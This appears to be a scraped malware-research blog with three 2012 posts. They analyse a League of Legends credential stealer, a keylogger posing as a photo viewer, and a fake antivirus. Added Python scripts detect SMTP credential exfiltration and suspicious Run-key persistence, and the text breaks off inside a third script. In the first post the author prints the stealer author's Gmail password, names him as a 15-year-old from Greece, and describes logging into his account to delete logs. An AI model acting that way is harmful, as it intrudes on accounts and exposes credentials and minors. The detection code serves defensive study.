MalwareDisasters Team

League of Legends Malware Attack (2012-09-13)<div style="text-align: justify;">
As you may already know, cyber criminals find all sorts of ways to infect computers and steal sensitive information, which they later use for their own purposes. This time, on Facebook, I stumbled upon a League of Legends themed scam; needless to say, most of my friends are also victims. They "offer" free Riot Points. Let's have a look then.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img337.imageshack.us/img337/1958/20120815201908.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="http://img337.imageshack.us/img337/1958/20120815201908.png" width="320" /></a></div>
<br />
<br />
As you can see, it's a very "amateur" project, probably written in VB (it is a .NET binary, as the decompilation further down shows). To me it looks rather "phishy" and I really doubt whether it works at all. I would also like to mention that Riot Games is a trustworthy company; don't go searching for "hacks" that promise free Riot Points, you will most likely fail and end up scammed or infected.<br />
<br />
What were my first thoughts? It's just a regular stealer that sends your information to the author. I was right. Let's check the network activity when you press the "Press Here For RP" button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img214.imageshack.us/img214/9189/20120815202617.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://img214.imageshack.us/img214/9189/20120815202617.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
You may have already noticed some strange network activity. But what is it, really? I can't make anything of it, because the packets are encrypted. So where is my information sent? I used a tool called .NET Reflector, a decompiler that will be able to enlighten us. Let's dive into the decompiled code and gather more information about the author.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img502.imageshack.us/img502/1041/20120812202150.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://img502.imageshack.us/img502/1041/20120812202150.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
As you can see, he's sending the logs through Gmail's SMTP server (smtp.gmail.com) to the red-blurred Gmail address. By the way, I am not that bad as to publish his e-mail; I will tell you later why. He only wants Textbox.1, which is obviously your username, and Textbox.2, which is your password. The subject of the e-mail is the victim's username and the body contains the password.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
His Gmail password is 59347763; if the password is changed, this programme becomes useless, as it won't get past Gmail's authentication and the logs won't be sent. Using Google I was able to find even more information about the author. He got the idea of creating a phishing application when he saw a tutorial on YouTube. Here he is asking for help, and he gave his e-mail address so people could contact him.</div>
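As an added example (not code from this post, and not the stealer's own code), here is the static check I would run on a .NET stealer like this one before even opening Reflector: pull out both ASCII and UTF-16LE strings and look for the <code>System.Net.Mail</code> API names sitting next to a hardcoded SMTP host and mailbox. .NET keeps type and member names as ASCII in the <code>#Strings</code> heap, but the program's own literals (server, address, password) are UTF-16LE in the <code>#US</code> heap, so a plain <code>strings</code> run misses exactly the values that matter. The byte blob <code>SAMPLE</code> is constructed to look like those heaps; the address and password in it are placeholders, not the author's.

```python
"""Find hardcoded SMTP exfiltration settings in a .NET stealer by string extraction.

Added example, not code from the post or the stealer. SAMPLE is a constructed
blob laid out like the .NET #Strings (ASCII names) and #US (UTF-16LE literals)
heaps; the mailbox and password in it are placeholders.
"""
import re
from dataclasses import dataclass, field

_ASCII_RUN = rb"[\x20-\x7e]{%d,}"            # plain printable run
_UTF16LE_RUN = rb"(?:[\x20-\x7e]\x00){%d,}"  # printable char followed by 0x00, repeated


def extract_strings(data: bytes, min_len: int = 6) -> list[tuple[int, str, str]]:
    """Return (offset, encoding, text) for every printable run, in file order."""
    hits = []
    for m in re.finditer(_ASCII_RUN % min_len, data):
        hits.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in re.finditer(_UTF16LE_RUN % min_len, data):
        hits.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(hits)


_MAIL_API = {"System.Net.Mail", "SmtpClient", "NetworkCredential", "MailMessage", "EnableSsl"}
_SMTP_HOST = re.compile(r"^smtp\.[\w-]+(?:\.[\w-]+)+$", re.I)
_EMAIL = re.compile(r"^[\w.+-]+@[\w-]+(?:\.[\w-]+)+$")


@dataclass
class SmtpExfilReport:
    mail_api: list[str] = field(default_factory=list)
    smtp_hosts: list[str] = field(default_factory=list)
    addresses: list[str] = field(default_factory=list)
    candidate_secrets: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Mail API plus a hardcoded server and mailbox is the stealer pattern.
        return bool(self.mail_api and self.smtp_hosts and self.addresses)


def find_smtp_exfil(data: bytes) -> SmtpExfilReport:
    report = SmtpExfilReport()
    strings = extract_strings(data)
    for i, (_, enc, text) in enumerate(strings):
        if enc == "ascii" and text in _MAIL_API:
            report.mail_api.append(text)
        elif enc == "utf-16le" and _SMTP_HOST.match(text):
            report.smtp_hosts.append(text)
        elif enc == "utf-16le" and _EMAIL.match(text):
            report.addresses.append(text)
            # Heuristic: new NetworkCredential(user, password) emits both literals
            # back to back, so the next UTF-16 literal is the likely password.
            nxt = strings[i + 1] if i + 1 < len(strings) else None
            if nxt and nxt[1] == "utf-16le":
                report.candidate_secrets.append(nxt[2])
    return report


def _us(s: str) -> bytes:
    """One #US-style entry: a (fake) length byte, UTF-16LE text, terminator."""
    return bytes([len(s) * 2 + 1]) + s.encode("utf-16-le") + b"\x00"


SAMPLE = (  # constructed, not bytes from the real sample
    b"MZ\x90\x00" + b"\x00" * 12                                              # stand-in for PE headers
    + b"System.Net.Mail\x00SmtpClient\x00NetworkCredential\x00EnableSsl\x00"  # #Strings-style names
    + _us("Press Here For RP")
    + _us("smtp.gmail.com")
    + _us("logs.dropbox@example.com")   # placeholder for the blurred Gmail address
    + _us("Hunter2!Demo")               # placeholder for the hardcoded password
    + _us("Riot Points Generator")
)

if __name__ == "__main__":
    r = find_smtp_exfil(SAMPLE)
    print("suspicious:", r.suspicious)
    print("hosts:", r.smtp_hosts, "addresses:", r.addresses, "secrets:", r.candidate_secrets)
```

To use it on a real file, replace <code>SAMPLE</code> with <code>open(path, "rb").read()</code>. With the constructed blob, the ASCII pass alone never sees <code>smtp.gmail.com</code>; only the UTF-16LE pass does, which is the whole point of doing both.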
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img99.imageshack.us/img99/6405/20120815204617.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="http://img99.imageshack.us/img99/6405/20120815204617.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img10.imageshack.us/img10/825/20120815204851.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="http://img10.imageshack.us/img10/825/20120815204851.png" width="320" /></a></div>
<br />
<br />
What literally shocked me is that he's only 15 years old and he comes from Greece, my own country. Here he wants to buy a "Spy Recording Camera".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img15.imageshack.us/img15/7376/20120815205118.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://img15.imageshack.us/img15/7376/20120815205118.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
What great times we live in: even a 15-year-old kid can create his own phishing application and start stealing information, just from a simple tutorial. Is there too much freedom on the internet, or what? Since he is only 15 years old (we are the same age), I don't want to ruin his life, and that's why I didn't show you his e-mail. I logged into his Gmail and deleted all the logs; I also warned him that next time I won't be so kind. This application should be detected as a PUP (Potentially Unwanted Programme).</div>
<br />
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/file/77186a0df7e1e33e619e1f0bc1491cf975749d378111cd72e2b4d883dfc2a9b3/analysis/">https://www.virustotal.com/file/77186a0df7e1e33e619e1f0bc1491cf975749d378111cd72e2b4d883dfc2a9b3/analysis/</a></div>
<div style="text-align: center;">
<br /></div>
I just wanted to show you how easy it is nowadays to create your own phishing programme and start stealing credentials. Stay safe!<br />
<br />
Phillip, Malware Researcher<br />
<br />
<br />
<br />
<br />
<br />
<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>

I give you a picture and you give me your private data! What do you say? (2012-07-19)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-ked4FbTErdk/UAWZ6B29m-I/AAAAAAAAAkw/-tBZ8TLquto/s1600/16-07-2012+16-45-35.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ked4FbTErdk/UAWZ6B29m-I/AAAAAAAAAkw/-tBZ8TLquto/s1600/16-07-2012+16-45-35.png" /></a></div>
MD5 : bf25f7588c58cd4b7cc5ac04ebfd00c5<br />
SHA1: 1c8e7315fae2a2af199bc3d79a5fec5cc8de4f79<br />
['Microsoft Visual Basic v5.0 - v6.0']<br />
<br />
<b>PE Information</b><br />
<i> Win32 Executable Microsoft Visual Basic 6 (86.2%)</i><br />
<i><span style="background-color: white;"> </span>Win32 Executable Generic (5.8%)</i><br />
<i><span style="background-color: white;"> </span>Win32 Dynamic Link Library (generic) (5.1%)</i><br />
<i><span style="background-color: white;"> </span>Generic Win/DOS Executable (1.3%)</i><br />
<i><span style="background-color: white;"> </span>DOS Executable Generic (1.3%)</i><br />
<i><br /></i><br />
<i><span style="background-color: white;"> </span>Optional Header: 0x400000</i><br />
<i><span style="background-color: white;"> </span>Address Of Entry Point: 0x1b04</i><br />
<i><span style="background-color: white;"> </span>Compile Time: 2012-01-25 10:58:42</i><br />
<i><span style="background-color: white;"> </span>Number of RVA and Sizes: 16</i><br />
<i><span style="background-color: white;"> </span>DLL: False</i><br />
<i><span style="background-color: white;"> </span>Number of Sections: 3</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HLPnPLS7ows/UAWZ_6_URYI/AAAAAAAAAk4/pdXIHjyio88/s1600/16-07-2012+16-53-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="43" src="http://3.bp.blogspot.com/-HLPnPLS7ows/UAWZ_6_URYI/AAAAAAAAAk4/pdXIHjyio88/s400/16-07-2012+16-53-02.png" width="400" /></a></div>
<br />
<span style="background-color: white;"><i>[IMAGE_RESOURCE_DIRECTORY]</i></span><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B000 0x0 Characteristics: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B004 0x4 TimeDateStamp: 0x4F1FFC81 [Wed Jan 25 12:58:41 2012 UTC]</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B008 0x8 MajorVersion: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B00A 0xA MinorVersion: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B00C 0xC NumberOfNamedEntries: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B00E 0xE NumberOfIdEntries: 0x3 </i><br />
<b><br /></b><br />
<b>Metadata</b><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>Translation: 0x0409 0x04b0</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>InternalName: Photo_Viewer_12_south</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>FileVersion: 12.00</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>CompanyName: ACDSee Image Viewer</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>ProductName: My_Photos</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>ProductVersion: 12.00</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>OriginalFilename: Photo_Viewer_12_south.exe</i><br />
<br />
<b>Registry</b><br />
<i>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<span class="Apple-tab-span" style="white-space: pre;"> </span></i><br />
<i>NTS<span class="Apple-tab-span" style="white-space: pre;"> </span>ACDSee Image Viewer<span class="Apple-tab-span" style="white-space: pre;"> </span>c:\windows\system32\wpowercfg.exe</i><br />
<br />
<a href="https://www.virustotal.com/file/68328901f9b90246777f41eaee42998343b111a065c2e26ddb0ac13364f3852a/analysis/" target="_blank"><span style="color: orange;">VT detection rate </span><b><span style="color: red;">19</span><span style="color: black;">/37</span></b></a><br />
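The Run-key entry above is the classic masquerade: a vendor-sounding value name ("ACDSee Image Viewer") pointing at an unknown binary dropped into system32. As an added example (not code from this post), here is a small audit of that pattern over a <code>.reg</code> export. The export text is constructed: it mixes the post's entry with benign-looking ones; the <code>%windir%</code> mapping and the baseline of known system32 autoruns are assumptions for the demo box, not a vetted whitelist.

```python
"""Audit Run-key persistence from a .reg export.

Added example, not code from the post. SAMPLE_REG is constructed; ENV_VARS and
KNOWN_SYSTEM_AUTORUNS are assumptions for the demo, not a vetted whitelist.
"""
import ntpath
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
ENV_VARS = {"%windir%": r"C:\Windows", "%systemroot%": r"C:\Windows"}  # assumed
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
KNOWN_SYSTEM_AUTORUNS = {"ctfmon.exe", "securityhealthsystray.exe"}       # constructed baseline

# "name"="data" line of a .reg export; both sides use \\ and \" escapes.
_REG_SZ = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def reg_unescape(s: str) -> str:
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_run_key(reg_text: str, key: str = RUN_KEY) -> dict[str, str]:
    """Return {value name: data} for the REG_SZ values under `key` only."""
    entries, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()
        elif in_key and (m := _REG_SZ.match(line)):  # hex:/dword: values are skipped
            entries[reg_unescape(m.group(1))] = reg_unescape(m.group(2))
    return entries


def command_to_exe(cmd: str) -> tuple[str, bool]:
    """Split a Run value into (executable path, was_quoted); arguments are dropped."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return (cmd[1:end] if end > 0 else cmd[1:]), True
    # Unquoted: take everything up to the first ".exe" token. An unquoted path
    # with spaces is ambiguous to Windows as well, which is why it gets flagged.
    m = re.match(r"(.*?\.exe)(?:\s|$)", cmd, re.I)
    return (m.group(1) if m else (cmd.split() or [cmd])[0]), False


def normalize(path: str) -> str:
    """Expand the assumed environment variables and lower-case the path."""
    for var, value in ENV_VARS.items():
        path = re.sub(re.escape(var), lambda _m, v=value: v, path, flags=re.I)
    return path.lower()


def audit_run_entries(entries: dict[str, str]) -> dict[str, list[str]]:
    """Return {value name: reasons} for the entries worth a second look."""
    findings = {}
    for name, cmd in entries.items():
        exe, quoted = command_to_exe(cmd)
        path = normalize(exe)
        base, folder = ntpath.basename(path), ntpath.dirname(path)
        reasons = []
        if not quoted and " " in exe:
            reasons.append("unquoted path containing spaces")
        if folder in SYSTEM_DIRS and base not in KNOWN_SYSTEM_AUTORUNS:
            reasons.append(f"unknown binary in a system directory: {base}")
        if folder not in SYSTEM_DIRS and not path.startswith(r"c:\program files"):
            reasons.append("runs from outside Program Files and the system directories")
        # The post's sample: a vendor-sounding value name whose target shares no
        # word with the path ("ACDSee Image Viewer" -> system32\wpowercfg.exe).
        words = [w for w in re.findall(r"[a-z0-9]+", name.lower()) if len(w) >= 4]
        if words and not any(w in path for w in words):
            reasons.append("value name does not match the target path")
        if reasons:
            findings[name] = reasons
    return findings


SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ACDSee Image Viewer"="c:\\windows\\system32\\wpowercfg.exe"
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
"Updater"="C:\\Users\\victim\\AppData\\Roaming\\Updater\\updater.exe /silent"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\Windows\\system32\\cmd.exe /c del dropper.tmp"
'''

if __name__ == "__main__":
    for name, reasons in audit_run_entries(parse_run_key(SAMPLE_REG)).items():
        print(name, "->", "; ".join(reasons))
```

On a live box you would feed it the output of <code>reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.reg</code> (a UTF-16 file; decode before passing it in). The name-versus-path check is a heuristic and will miss a malicious entry that picks a matching name, so treat it as a prioritisation aid rather than a verdict.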
<br />
The malware has keylogging functionality. All captured information is sent via SMTP, and when run it displays an image:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/--E6dQgjvQ9A/UAWaf5wvY8I/AAAAAAAAAlA/TkDNWdW3P3I/s1600/16-07-2012+16-46-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/--E6dQgjvQ9A/UAWaf5wvY8I/AAAAAAAAAlA/TkDNWdW3P3I/s320/16-07-2012+16-46-45.png" width="299" /></a></div>
<br />
Do you know this girl? :-)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.twitter.com/MalwareInt" target="_blank"><img border="0" height="135" src="http://3.bp.blogspot.com/-f1ynt36hKps/T_Z4vA5lJnI/AAAAAAAAAjA/GszFQ_A_YG0/s200/MalwareInt-Twitter.png" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Alex</div>
<br />

New variant of another fake antivirus program called Live Security Platinum (2012-07-13)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Zcs1pPMNsM4/UABrRvoP_zI/AAAAAAAAAjc/N66WpA9q4do/s1600/13-07-2012+14-34-59.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Zcs1pPMNsM4/UABrRvoP_zI/AAAAAAAAAjc/N66WpA9q4do/s1600/13-07-2012+14-34-59.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;">This is the icon used for the fakeAV</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Technical information & PE file attribute</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">MD5 : 8ed72a01f6dd01cf353091492d7e96c6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>SHA1: a810430d6d26e97b1a8b48898d8effe4ed8a140e</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>['Microsoft Visual C++ v6.0'], ['Microsoft Visual C++ 5.0'], ['Microsoft Visual C++'], ['Microsoft Visual C++ v6.0'], ['Installer VISE Custom']</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>PE information & sections:</b></span><i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Win32 Executable MS Visual C++ (generic) (65.2%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Win32 Executable Generic (14.7%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Win32 Dynamic Link Library (generic) (13.1%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Generic Win/DOS Executable (3.4%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> DOS Executable Generic (3.4%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Optional Header: 0x400000</i><br />
<i style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"> Address Of Entry Point: 0x1953</span></i><br />
<i><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">Compile Time: 2012-07-12 09:06:36</span></i><br />
<i><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">Number of RVA and Sizes: 16</span></i><br />
<i><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">Number of Sections: 4</span></i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hcGHFDOqXmI/UABr65XPlVI/AAAAAAAAAjk/fRzBJVVxrfU/s1600/13-07-2012+14-26-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-hcGHFDOqXmI/UABr65XPlVI/AAAAAAAAAjk/fRzBJVVxrfU/s1600/13-07-2012+14-26-27.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Imported DLLs and API:</b><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;">[1] KERNEL32.dll </i><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407000 Sleep</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407004 CloseHandle</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407008 GetProcAddress</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40700c GetModuleHandleA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407010 InterlockedExchange</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407014 SetEvent</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407018 CreateFileA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40701c VirtualAllocEx</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407020 LCMapStringA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407024 GetStringTypeW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407028 GetStringTypeA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40702c MultiByteToWideChar</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407030 RaiseException</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407034 LoadLibraryA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407038 GetOEMCP</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40703c GetStartupInfoA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407040 GetCommandLineA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407044 GetVersion</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407048 ExitProcess</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40704c HeapFree</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407050 TerminateProcess</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407054 GetCurrentProcess</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407058 UnhandledExceptionFilter</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40705c GetModuleFileNameA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407060 FreeEnvironmentStringsA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407064 FreeEnvironmentStringsW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407068 WideCharToMultiByte</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40706c GetEnvironmentStrings</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407070 GetEnvironmentStringsW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407074 SetHandleCount</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407078 GetStdHandle</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40707c GetFileType</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407080 HeapDestroy</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407084 HeapCreate</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407088 VirtualFree</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40708c RtlUnwind</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407090 WriteFile</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407094 HeapAlloc</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407098 VirtualAlloc</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40709c HeapReAlloc</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070a0 GetCPInfo</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070a4 GetACP</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070a8 LCMapStringW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>[2] USER32.dll </i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070b0 LoadBitmapA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070b4 ShowWindow</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070b8 LoadImageA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070bc LoadIconA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>[3] WINMM.dll </i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070c4 mixerGetControlDetailsA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<a href="https://www.virustotal.com/file/959161c7bc1736e9f83b351f46b2cc92e22cfffde6bc38dd67e12e007d27cd01/analysis/" style="background-color: white; font-family: Arial, Helvetica, sans-serif;" target="_blank"><span style="color: orange;">VT information</span></a><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> about detection rate </span><b style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="color: red;">22</span>/42</b><br />
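Most of that KERNEL32 list is the statically linked MSVC 6 C runtime (heap, locale, startup and exit helpers), not the author's code. As an added example (not code from this post), the script below transcribes the import table printed above and does three things with it: computes the import hash the way pefile's <code>get_imphash()</code> does (DLL name lower-cased with the <code>.dll</code>/<code>.ocx</code>/<code>.sys</code> suffix stripped, <code>dll.func</code> entries joined by commas in import order, MD5), strips the CRT boilerplate so the imports the author actually chose stand out, and tags what is left with capabilities. Ordinal imports, which pefile resolves through per-DLL lookup tables, are not handled because this sample has none; the CRT set and the capability rules are this example's own heuristics, and the hash is only comparable to VT's if the transcription matches the real import order.

```python
"""Import-table triage for the Live Security Platinum sample listed above.

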